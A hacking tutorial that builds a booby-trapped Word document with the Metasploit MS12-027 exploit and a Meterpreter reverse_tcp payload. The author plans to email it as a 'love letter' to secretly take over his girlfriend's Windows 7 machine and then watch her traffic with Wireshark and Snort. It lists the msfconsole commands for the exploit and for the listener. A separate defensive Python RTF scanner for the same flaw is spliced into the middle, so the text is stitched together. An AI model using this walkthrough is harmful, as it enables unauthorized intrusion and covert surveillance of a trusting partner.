
Hacking Windows 7


Step 1: Compromise the System

Let's fire up BackTrack and Metasploit and figure out a way to compromise her system.

A couple of years back (April 2012), an exploit was found in the wild that triggers a buffer overflow (I'll be doing a tutorial to explain buffer overflows soon) on Windows 7 systems running Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.

In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed the Meterpreter so that I can "own" her system and check up on her.

Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.

When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend's computer, we can find it by typing at the msfconsole:

  • msf > search ms12_027

This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.

Step 2: Let's Get Some Background Info

If I'm new to an exploit, I like to learn a little about what it does before I start. Let's type:

  • msf > info

Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:

"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted..."

Notice that it also states "The DEP/ASLR bypass on Office 2010...". For those of you who are unfamiliar, DEP is Data Execution Prevention and ASLR is Address Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.
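As an added defensive check (not part of the original tutorial or of the Metasploit module), here is a small Python triage script that flags RTF files embedding an OLE object tied to the MSCOMCTL ListView control, the component named in the module description above. The ListView CLSID and ProgID strings are assumed from public MS12-027 signatures (verify them against your own references), and the two sample documents are constructed inline.

```python
import re
import uuid

# Indicators for the MSCOMCTL ListView control patched by MS12-027.
# Assumption: CLSID/ProgID taken from public signatures, not from this page.
LISTVIEW_CLSID = uuid.UUID("BDD1F04B-858B-11D1-B16A-00C0F0283628")
PROGID_MARKERS = (b"MSComctlLib", b"ListViewCtrl")

# \objdata carries the embedded OLE object as a run of hex digits.
OBJDATA_RE = re.compile(rb"\\objdata\b\s*([0-9A-Fa-f\s]+)")


def extract_objdata(rtf: bytes) -> list:
    """Return the decoded bytes of every \\objdata hex blob in an RTF file."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", match.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]  # tolerate a truncated trailing nibble
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def scan_rtf(rtf: bytes) -> dict:
    """Flag an RTF that embeds an object referencing the ListView control.

    The ProgID may appear as text (\\objclass) or inside the OLE blob; the
    CLSID is searched in its on-disk little-endian GUID encoding.
    """
    blobs = extract_objdata(rtf)
    progid_hit = any(m in rtf for m in PROGID_MARKERS) or any(
        m in blob for blob in blobs for m in PROGID_MARKERS)
    clsid_hit = any(LISTVIEW_CLSID.bytes_le in blob for blob in blobs)
    return {
        "objects": len(blobs),
        "progid_hit": progid_hit,
        "clsid_hit": clsid_hit,
        "suspicious": bool(blobs) and (progid_hit or clsid_hit),
    }


# Constructed samples: a minimal RTF whose OLE blob carries the ListView CLSID,
# and a plain document with no embedded objects.
_fake_ole = b"\x01\x05\x00\x00\x02\x00\x00\x00" + LISTVIEW_CLSID.bytes_le + b"\x00" * 16
SAMPLE_MALICIOUS_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass MSComctlLib.ListViewCtrl.2}"
                        b"{\\*\\objdata " + _fake_ole.hex().encode() + b"}}}")
SAMPLE_BENIGN_RTF = b"{\\rtf1 Just a love letter, no objects.}"

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_MALICIOUS_RTF))  # suspicious: True
    print(scan_rtf(SAMPLE_BENIGN_RTF))     # suspicious: False
```

Run it over a mail gateway quarantine folder to triage .doc/.rtf attachments before a user opens them.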

Step 3: Show Targets & Create Doc

Since we're pretty certain she uses Office 2007 and not Office 2010, let's set our target for 2007.

  • set target 0

Now, rather than use the generic msf.doc that comes with this exploit, let's give it a name that will entice her to open it. Let's call it loveletter.doc.

  • set FILENAME loveletter.doc

We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.

  • set PAYLOAD windows/meterpreter/reverse_tcp

  • set LHOST 192.168.1.11

With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory under the name we gave it, loveletter.doc.

Step 4: Multi Handler

Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.

  • use exploit/multi/handler

  • set PAYLOAD windows/meterpreter/reverse_tcp

  • set LHOST 192.168.1.111

  • exploit

Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend's computer. Let's email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!

Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and, even better, set up Snort to look for keywords in her TCP stream going through our computer.

So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.
